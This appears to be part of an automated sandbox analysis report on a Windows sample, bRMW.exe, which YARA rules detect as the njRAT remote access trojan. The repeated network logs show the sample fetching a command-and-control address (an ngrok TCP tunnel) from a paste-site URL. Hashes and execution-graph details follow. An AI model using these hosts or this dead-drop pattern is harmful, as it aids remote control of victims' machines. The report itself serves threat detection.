                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:09:52 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 35 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:52 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                16192.168.2.549746148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:55 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:09:56 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 30 39 3a 35 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:09:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:09:56 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                17192.168.2.549748148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:09:59 UTC124OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                2023-11-23 00:10:00 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 31 30 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:10:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:10:00 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                18192.168.2.549750148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:10:03 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:10:03 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 31 30 3a 30 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:10:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:10:03 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                19192.168.2.549752148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:10:07 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:10:07 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 31 30 3a 30 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:10:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:10:07 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                20192.168.2.549754148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:10:11 UTC124OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                2023-11-23 00:10:11 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 31 30 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:10:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:10:11 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                21192.168.2.549757148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:10:15 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:10:15 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 31 30 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:10:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:10:15 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                22192.168.2.549759148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:10:18 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:10:19 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 31 30 3a 31 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:10:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:10:19 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                23192.168.2.549761148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:10:22 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:10:23 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 31 30 3a 32 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:10:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:10:23 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                24192.168.2.549763148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:10:26 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:10:27 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 31 30 3a 32 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:10:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:10:27 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                25192.168.2.549765148.72.177.2124432748C:\Users\user\Desktop\bRMW.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2023-11-23 00:10:31 UTC148OUTGET /download/rcd5ihynxw HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
                                                                                                Host: pt.textbin.net
                                                                                                Connection: Keep-Alive
                                                                                                2023-11-23 00:10:31 UTC1269INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 30 30 3a 31 30 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 49 50 4e 67 52 6f 6b 2e 68 74 6d 6c 22 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 23 Nov 2023 00:10:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.12Content-Disposition: attachment; filename="IPNgRok.html"pragma: no-cach
                                                                                                2023-11-23 00:10:31 UTC34INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 73 61 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 170.tcp.sa.ngrok.io:111370


                                                                                                050100150200s020406080100

                                                                                                Click to jump to process

                                                                                                050100150200s0.00246MB

                                                                                                Click to jump to process

                                                                                                • File
                                                                                                • Registry
                                                                                                • Network

                                                                                                Click to dive into process behavior distribution

                                                                                                Target ID:0
                                                                                                Start time:01:08:51
                                                                                                Start date:23/11/2023
                                                                                                Path:C:\Users\user\Desktop\bRMW.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\Desktop\bRMW.exe
                                                                                                Imagebase:0xff0000
                                                                                                File size:27'136 bytes
                                                                                                MD5 hash:FA139AE9C858237134267631FAEA725B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000000.1994678627.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000000.00000000.1994678627.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:false
                                                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                Execution Graph

                                                                                                Execution Coverage

                                                                                                Dynamic/Packed Code Coverage

                                                                                                Signature Coverage

                                                                                                Execution Coverage:7.8%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:4
                                                                                                Total number of Limit Nodes:0
                                                                                                Show Legend
                                                                                                Hide Nodes/Edges
                                                                                                execution_graph 14838 31d8208 DuplicateHandle 14839 31d829e 14838->14839 14840 31d3b40 KiUserExceptionDispatcher 14841 31d3b6f 14840->14841

                                                                                                Executed Functions

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.4453359957.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_31d0000_bRMW.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7d55c870b323b09e715f32e2c644a8da1465b99abbc471a843b592c1619c4401
                                                                                                • Instruction ID: 1916842e862d74b60a01b7f8aad510bb146114cba4e2f3d92f71fc07fc1bac67
                                                                                                • Opcode Fuzzy Hash: 7d55c870b323b09e715f32e2c644a8da1465b99abbc471a843b592c1619c4401
                                                                                                • Instruction Fuzzy Hash: 5D527D31A00619CFCB14CF68C884AAEB7B6FF4A304F5584A9E919AB251D770FD85CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 268 31d8208-31d829c DuplicateHandle 269 31d829e-31d82a4 268->269 270 31d82a5-31d82c2 268->270 269->270
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031D828F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.4453359957.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_31d0000_bRMW.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID: `W)
                                                                                                • API String ID: 3793708945-2584524621
                                                                                                • Opcode ID: ab009985a5854fc5e979d39f2080daaec770ceb1d7b870f0fcac0f641a75189d
                                                                                                • Instruction ID: d8a81862d568ade5b37c133379057c950601e01a9925ffb6cf893b62563b65ac
                                                                                                • Opcode Fuzzy Hash: ab009985a5854fc5e979d39f2080daaec770ceb1d7b870f0fcac0f641a75189d
                                                                                                • Instruction Fuzzy Hash: 4221C4B59002489FDB10CFAAD984ADEFBF9FB48310F14841AE918A3350D378A944CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 263 31d8200-31d829c DuplicateHandle 264 31d829e-31d82a4 263->264 265 31d82a5-31d82c2 263->265 264->265
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031D828F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.4453359957.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_31d0000_bRMW.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID: `W)
                                                                                                • API String ID: 3793708945-2584524621
